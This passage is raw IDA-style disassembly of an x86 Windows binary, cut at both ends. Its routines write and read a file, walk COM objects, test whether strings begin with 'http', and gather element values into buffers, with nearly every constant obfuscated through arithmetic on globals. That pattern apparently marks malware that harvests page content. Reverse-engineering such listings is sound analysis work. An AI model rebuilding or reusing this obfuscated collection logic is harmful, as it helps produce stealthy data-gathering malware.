lea eax, [ebp+var_120A]
push eax
call sub_423599
push dword ptr ds:1001418Ch
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_4251A5
add esp, 14h
mov edi, ds:100141E4h
add edi, 0FFFEh
cmp eax, edi
jnz short loc_42129D
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D024h
push 10014E34h
call sub_41B08F
push eax
push [ebp+arg_0]
call dword ptr ds:1000D024h
add esp, 14h
loc_42129D: ; CODE XREF: sub_4210C1+1B3�j
movsx eax, word ptr ds:10014220h
add eax, ds:10014208h
sub eax, 0Ch
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_4251A5
add esp, 0Ch
mov edi, ds:100140C8h
add edi, 0FFFDh
cmp eax, edi
jnz short loc_42130B
push 10014E29h
call sub_41B08F
push eax
push [ebp+arg_0]
call dword ptr ds:1000D024h
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D024h
push 10014E24h
call sub_41B08F
push eax
push [ebp+arg_0]
call dword ptr ds:1000D024h
add esp, 20h
loc_42130B: ; CODE XREF: sub_4210C1+20D�j
inc [ebp+var_1008]
loc_421311: ; CODE XREF: sub_4210C1+175�j
push [ebp+var_1004]
call sub_42491B
pop ecx
mov [ebp+var_100C], eax
mov eax, ds:10014108h
movsx edx, word ptr ds:100140F4h
add eax, edx
sub eax, 0Eh
cmp [ebp+var_100C], eax
jnb short loc_421390
movsx eax, word ptr ds:10014160h
sub eax, 5
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_4251A5
add esp, 0Ch
mov edi, ds:100141A0h
add edi, 0FFFFh
cmp eax, edi
jnz short loc_421390
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D024h
push 10014E1Fh
call sub_41B08F
push eax
push [ebp+arg_0]
call dword ptr ds:1000D024h
add esp, 14h
loc_421390: ; CODE XREF: sub_4210C1+279�j
; sub_4210C1+2A6�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_42139A: ; CODE XREF: sub_4210C1+2DE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_42139A
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, ds:100140ACh
sub edx, 5
cmp eax, edx
jnz loc_4211E3
push 10014E1Ah
call sub_41B08F
push eax
push [ebp+arg_0]
call dword ptr ds:1000D024h
add esp, 0Ch
mov eax, [ebp+var_1008]
mov ds:1001431Ch, eax
loc_4213E7: ; CODE XREF: sub_4210C1+9B�j
; sub_4210C1+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_4210C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4213EC proc near ; CODE XREF: sub_41EF87+125�p
var_104 = byte ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push 0
push dword ptr ds:100140DCh
push 3
push 0
mov eax, ds:100140D8h
sub eax, 5
push eax
push 80000000h
push 10011220h
call dword ptr ds:10013968h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_42142A
mov eax, 2Ah
jmp short loc_42148D
; ---------------------------------------------------------------------------
loc_42142A: ; CODE XREF: sub_4213EC+35�j
push 0
lea eax, [ebp+var_104]
push eax
push 0FFh
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D02Ch
mov esi, eax
push edi
call dword ptr ds:1001282Ch
mov eax, ds:100141A8h
movsx edx, word ptr ds:10014110h
add eax, edx
sub eax, 8
cmp esi, eax
jnz short loc_42146B
mov eax, 2Ah
jmp short loc_42148D
; ---------------------------------------------------------------------------
loc_42146B: ; CODE XREF: sub_4213EC+76�j
movzx eax, [ebp+var_FF]
mov edx, ds:100140A4h
add edx, 18h
cmp eax, edx
jge short loc_421486
mov eax, 2Ah
jmp short loc_42148D
; ---------------------------------------------------------------------------
loc_421486: ; CODE XREF: sub_4213EC+91�j
movzx eax, [ebp+var_FF]
loc_42148D: ; CODE XREF: sub_4213EC+3C�j
; sub_4213EC+7D�j ...
pop edi
pop esi
leave
retn
sub_4213EC endp
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421499 proc near ; CODE XREF: sub_41F8D9+379�p
; sub_41F8D9+483�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
movsx edi, word ptr ds:10014128h
sub edi, 5
cmp edx, edi
jnz short loc_4214BE
mov eax, [ebp+arg_0]
jmp short loc_4214D8
; ---------------------------------------------------------------------------
loc_4214BE: ; CODE XREF: sub_421499+1E�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_4214D8: ; CODE XREF: sub_421499+23�j
pop edi
pop esi
leave
retn
sub_421499 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4214DC proc near ; CODE XREF: sub_41EF87+357�p
; sub_41EF87+3E5�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push 0
push 80h
push 4
push 0
mov eax, ds:1001422Ch
sub eax, 4
push eax
push 40000000h
push 10011220h
call dword ptr ds:10013968h
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10013D80h
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_42151F: ; CODE XREF: sub_4214DC+48�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_42151F
mov esi, eax
push 0
lea ebx, [ebp+var_4]
push ebx
push esi
push [ebp+arg_0]
push edi
call dword ptr ds:10013D6Ch
push edi
call dword ptr ds:1001282Ch
pop edi
pop esi
pop ebx
leave
retn
sub_4214DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421545 proc near ; CODE XREF: .data:0041BB16�p
var_71F16 = byte ptr -71F16h
var_71F10 = dword ptr -71F10h
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EF0 = byte ptr -70EF0h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50EA4 = byte ptr -50EA4h
var_50EA0 = dword ptr -50EA0h
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_425D5D
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call dword ptr ds:1000D040h
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
mov eax, ds:100141D8h
sub eax, 3
push eax
push [ebp+arg_0]
call dword ptr ds:10011218h
mov ebx, eax
cmp ebx, ds:10014248h
jnz loc_4222D3
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push 10015CD4h
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100141F4h
add eax, ds:100140FCh
sub eax, 0Ah
cmp ebx, eax
jnz loc_4222D3
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov eax, ds:100140B0h
add eax, ds:10014150h
sub eax, 0Bh
cmp ebx, eax
jnz loc_4222C7
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_41BCA3
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call dword ptr ds:10013D84h
cmp [ebp+var_40E57], 68h
jnz short loc_421652
cmp [ebp+var_40E56], 74h
jnz short loc_421652
cmp [ebp+var_40E55], 74h
jnz short loc_421652
cmp [ebp+var_40E54], 70h
jz short loc_421657
loc_421652: ; CODE XREF: sub_421545+F0�j
; sub_421545+F9�j ...
jmp loc_4222C7
; ---------------------------------------------------------------------------
loc_421657: ; CODE XREF: sub_421545+10B�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
mov eax, ds:10014170h
sub eax, 5
cmp ebx, eax
jz short loc_421682
and [ebp+var_30E4C], 0
loc_421682: ; CODE XREF: sub_421545+134�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, ds:100141CCh
dec eax
cmp ebx, eax
jnz loc_4222C7
lea eax, [ebp+var_40E6C]
push eax
push 10015C44h
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:100140F8h
dec eax
cmp ebx, eax
jnz loc_4222BB
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
movsx eax, word ptr ds:100141F0h
mov edx, eax
add edx, eax
mov eax, edx
sub eax, 4
cmp ebx, eax
jnz loc_4222AF
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:1001420Ch
sub eax, 7
cmp ebx, eax
jnz loc_4222A3
movsx eax, word ptr ds:10014090h
sub eax, 4
neg eax
mov [ebp+var_40E5C], eax
push 10014E08h
call sub_4230FC
push eax
call dword ptr ds:1000DFF8h
mov [ebp+var_30E44], eax
push 10014DF8h
call sub_4230FC
add esp, 8
push eax
call dword ptr ds:1000DFF8h
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_425D7D
loc_42177B: ; CODE XREF: sub_421545+D32�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
mov eax, ds:100141A8h
sub eax, 7
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_4217E0
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:1001424Ch
sub eax, 9
cmp ebx, eax
jnz loc_422265
push 10014DE7h
call sub_41B08F
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D024h
add esp, 0Ch
jmp loc_4218FB
; ---------------------------------------------------------------------------
loc_4217E0: ; CODE XREF: sub_421545+254�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push 10015C94h
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:1001417Ch
movsx edx, word ptr ds:10014228h
add eax, edx
sub eax, 0Dh
cmp ebx, eax
jnz loc_422265
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
movsx eax, word ptr ds:10014204h
sub eax, 6
cmp ebx, eax
jz short loc_421882
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_422265
; ---------------------------------------------------------------------------
loc_421882: ; CODE XREF: sub_421545+32A�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:10014150h
add eax, ds:10014238h
sub eax, 0Bh
cmp ebx, eax
jz short loc_4218C6
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_422265
; ---------------------------------------------------------------------------
loc_4218C6: ; CODE XREF: sub_421545+362�j
push 10014DD8h
call sub_41B08F
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10013810h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D024h
add esp, 18h
loc_4218FB: ; CODE XREF: sub_421545+296�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, ds:100141ACh
sub eax, 5
cmp ebx, eax
jnz loc_422265
mov eax, ds:100140A8h
sub eax, 4
mov [ebp+var_30E50], eax
jmp loc_422253
; ---------------------------------------------------------------------------
loc_421933: ; CODE XREF: sub_421545+D1A�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
movsx eax, word ptr ds:100141DCh
mov edx, ds:100140D8h
sub edx, 5
mov [ebp+eax+var_50EA4], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word ptr ds:10014090h
add eax, ds:1001415Ch
sub eax, 5
cmp ebx, eax
jnz loc_42224D
push 10014DCAh
call sub_41B08F
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10013810h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D024h
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push 10015C64h
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:100140E8h
movsx edx, word ptr ds:10014130h
add eax, edx
sub eax, 6
cmp ebx, eax
jnz loc_421EDF
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
mov eax, ds:10014184h
add eax, ds:100140DCh
dec eax
cmp ebx, eax
jnz loc_421ED3
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_41BCA3
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call dword ptr ds:10013D84h
mov eax, ds:10014100h
sub eax, 7
mov [ebp+var_40E9C], eax
jmp short loc_421AD8
; ---------------------------------------------------------------------------
loc_421A8B: ; CODE XREF: sub_421545+59F�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
mov edx, ds:100140FCh
add edx, 6
cmp eax, edx
jz short loc_421ABC
movsx edx, word ptr ds:10014210h
movsx ecx, word ptr ds:10014148h
lea edx, [edx+ecx+4]
cmp eax, edx
jnz short loc_421AD2
loc_421ABC: ; CODE XREF: sub_421545+55F�j
mov eax, [ebp+var_40E9C]
mov edx, ds:100140FCh
sub edx, 7
mov [ebp+eax+var_60E9F], dl
loc_421AD2: ; CODE XREF: sub_421545+575�j
inc [ebp+var_40E9C]
loc_421AD8: ; CODE XREF: sub_421545+544�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_421A8B
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_425D7D
mov eax, ds:100141CCh
add eax, ds:10014154h
sub eax, 4
mov [ebp+var_40E9C], eax
loc_421B0D: ; CODE XREF: sub_421545+705�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_421B1D: ; CODE XREF: sub_421545+5DD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_421B1D
mov [ebp+var_60EA8], eax
movsx edx, word ptr ds:100141B8h
sub edx, 5
cmp eax, edx
jz short loc_421B49
mov edx, ds:10014140h
lea edx, [edx+edx+0B6h]
cmp eax, edx
jbe short loc_421B4E
loc_421B49: ; CODE XREF: sub_421545+5F1�j
jmp loc_421C21
; ---------------------------------------------------------------------------
loc_421B4E: ; CODE XREF: sub_421545+602�j
mov eax, ds:100140A4h
sub eax, 9
mov [ebp+var_60EA4], eax
jmp short loc_421B8D
; ---------------------------------------------------------------------------
loc_421B5E: ; CODE XREF: sub_421545+654�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
movsx edx, word ptr ds:100140F4h
mov ecx, ds:10014184h
lea edx, [edx+ecx+18h]
cmp eax, edx
jnz short loc_421B9B
inc [ebp+var_60EA4]
loc_421B8D: ; CODE XREF: sub_421545+617�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_421B5E
loc_421B9B: ; CODE XREF: sub_421545+640�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz short loc_421C21
mov eax, ds:10014124h
dec eax
push eax
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_4251A5
add esp, 0Ch
mov [ebp+var_60EDC], eax
mov eax, ds:100140BCh
add eax, 0FFF4h
add eax, ds:1001424Ch
cmp [ebp+var_60EDC], eax
jnz short loc_421C21
push 10014DC5h
call sub_41B08F
push eax
lea edi, [ebp+var_50E9B]
push edi
call dword ptr ds:1000D024h
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call dword ptr ds:1000D024h
add esp, 14h
loc_421C21: ; CODE XREF: sub_421545:loc_421B49�j
; sub_421545+662�j ...
mov eax, [ebp+var_60EA8]
mov edx, ds:1001414Ch
add edx, ds:100140FCh
sub edx, 0Eh
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_421B0D
mov eax, ds:10014158h
add eax, ds:100141D0h
sub eax, 0Dh
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_421C6D: ; CODE XREF: sub_421545+72D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_421C6D
mov [ebp+var_60EA8], eax
movsx eax, word ptr ds:10014190h
add eax, ds:1001420Ch
sub eax, 0Ch
mov [ebp+var_40E9C], eax
jmp loc_421EA1
; ---------------------------------------------------------------------------
loc_421C95: ; CODE XREF: sub_421545+968�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
movsx edx, word ptr ds:100140E4h
add edx, 1Eh
cmp eax, edx
jz short loc_421CB8
and [ebp+var_60EAC], 0
loc_421CB8: ; CODE XREF: sub_421545+76A�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
movsx edx, word ptr ds:10014204h
add edx, 1Ah
cmp eax, edx
jnz loc_421E44
mov eax, ds:100140F0h
cmp [ebp+var_40E9C], eax
jbe loc_421D93
movsx eax, word ptr ds:10014180h
mov edx, [ebp+var_40E9C]
mov ecx, eax
add ecx, eax
mov eax, ecx
sub eax, 9
sub edx, eax
mov al, [ebp+edx+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, ds:100140B0h
add edx, 0Eh
add edx, ds:10014188h
cmp eax, edx
jle short loc_421D35
mov edx, ds:10014134h
add edx, 2Ch
cmp eax, edx
jl short loc_421D89
loc_421D35: ; CODE XREF: sub_421545+7E1�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:100140ACh
add edx, 34h
cmp eax, edx
jle short loc_421D5F
mov edx, ds:1001417Ch
add edx, 33h
movsx ecx, word ptr ds:100141B8h
add edx, ecx
cmp eax, edx
jl short loc_421D89
loc_421D5F: ; CODE XREF: sub_421545+802�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:10014184h
add edx, 77h
movsx ecx, word ptr ds:100140E4h
add edx, ecx
cmp eax, edx
jle short loc_421D93
mov edx, ds:100141D8h
add edx, 7Ch
cmp eax, edx
jge short loc_421D93
loc_421D89: ; CODE XREF: sub_421545+7EE�j
; sub_421545+818�j
mov [ebp+var_60EAC], 1
loc_421D93: ; CODE XREF: sub_421545+79E�j
; sub_421545+835�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_421E44
mov eax, [ebp+var_40E9C]
mov edx, ds:10014244h
sub edx, 8
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, ds:100140F0h
add edx, 1Eh
add edx, ds:100140E0h
cmp eax, edx
jle short loc_421DF0
mov edx, ds:10014140h
add edx, 20h
add edx, ds:100140FCh
cmp eax, edx
jl short loc_421E3A
loc_421DF0: ; CODE XREF: sub_421545+896�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:100140B0h
add edx, 27h
add edx, ds:10014218h
cmp eax, edx
jle short loc_421E18
movsx edx, word ptr ds:100141C0h
add edx, 38h
cmp eax, edx
jl short loc_421E3A
loc_421E18: ; CODE XREF: sub_421545+8C3�j
movzx eax, [ebp+var_60EDD]
movsx edx, word ptr ds:10014128h
add edx, 75h
cmp eax, edx
jle short loc_421E44
mov edx, ds:10014158h
add edx, 77h
cmp eax, edx
jge short loc_421E44
loc_421E3A: ; CODE XREF: sub_421545+8A9�j
; sub_421545+8D1�j
mov [ebp+var_60EAC], 1
loc_421E44: ; CODE XREF: sub_421545+78D�j
; sub_421545+85A�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_421E6D
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_421E6D: ; CODE XREF: sub_421545+906�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:100141E8h
add edx, 10h
movsx ecx, word ptr ds:100141DCh
add edx, ecx
cmp eax, edx
jnz short loc_421E9B
mov [ebp+var_60EAC], 1
loc_421E9B: ; CODE XREF: sub_421545+94A�j
inc [ebp+var_40E9C]
loc_421EA1: ; CODE XREF: sub_421545+74B�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_421C95
mov eax, [ebp+var_60EB4]
movsx edx, word ptr ds:10014190h
movsx ecx, word ptr ds:10014090h
add edx, ecx
sub edx, 0Ah
mov [ebp+eax+var_50E9B], dl
loc_421ED3: ; CODE XREF: sub_421545+506�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_421EDF: ; CODE XREF: sub_421545+4DA�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push 10015C74h
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10014134h
sub eax, 4
cmp ebx, eax
jnz loc_4221E0
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word ptr ds:10014114h
add eax, ds:10014238h
sub eax, 12h
cmp ebx, eax
jnz loc_4221D4
mov eax, ds:1001410Ch
mov [ebp+var_50EA0], eax
jmp loc_4221C2
; ---------------------------------------------------------------------------
loc_421F51: ; CODE XREF: sub_421545+C89�j
push dword ptr ds:100140DCh
call dword ptr ds:1001380Ch
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp+var_50EA0]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
mov eax, ds:100140D8h
sub eax, 5
cmp ebx, eax
jnz loc_4221BC
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push 10015C64h
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10014230h
add eax, ds:1001414Ch
sub eax, 0Fh
cmp ebx, eax
jnz loc_4221B0
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:10014100h
add eax, ds:100140B0h
sub eax, 10h
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_42202F
cmp [ebp+var_60EF0], 8
jz short loc_422034
loc_42202F: ; CODE XREF: sub_421545+ADE�j
jmp loc_4221A4
; ---------------------------------------------------------------------------
loc_422034: ; CODE XREF: sub_421545+AE8�j
mov eax, ds:1001418Ch
mov edx, ds:1001414Ch
sub edx, 8
mov [ebp+eax+var_70EF0], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_41BCA3
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call dword ptr ds:10013D84h
movsx eax, word ptr ds:1001411Ch
add eax, ds:100140DCh
movsx eax, byte ptr [ebp+eax+var_70EF4+1]
mov edx, ds:100141A4h
dec edx
cmp eax, edx
jz loc_4221A4
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_41C22E
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:1001419Ch
add eax, ds:100141CCh
sub eax, 0Ah
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:1001419Ch
add eax, ds:10014208h
mov edx, ds:100141A8h
add edx, ds:1001420Ch
sub edx, 0Fh
mov [ebp+eax+var_71F16], dl
or ebx, ebx
jnz short loc_42212F
cmp [ebp+var_60EF0], 8
jnz short loc_42212F
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_41BCA3
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F10], edi
push [ebp+var_60EE8]
call dword ptr ds:10013D84h
loc_42212F: ; CODE XREF: sub_421545+BB4�j
; sub_421545+BBE�j
push 10014DBDh
call sub_41B08F
push [ebp+var_50EA0]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10013810h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D024h
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D024h
push 10014DB8h
call sub_41B08F
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D024h
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D024h
add esp, 34h
loc_4221A4: ; CODE XREF: sub_421545:loc_42202F�j
; sub_421545+B4C�j
mov eax, [ebp+var_70EF4]
push eax
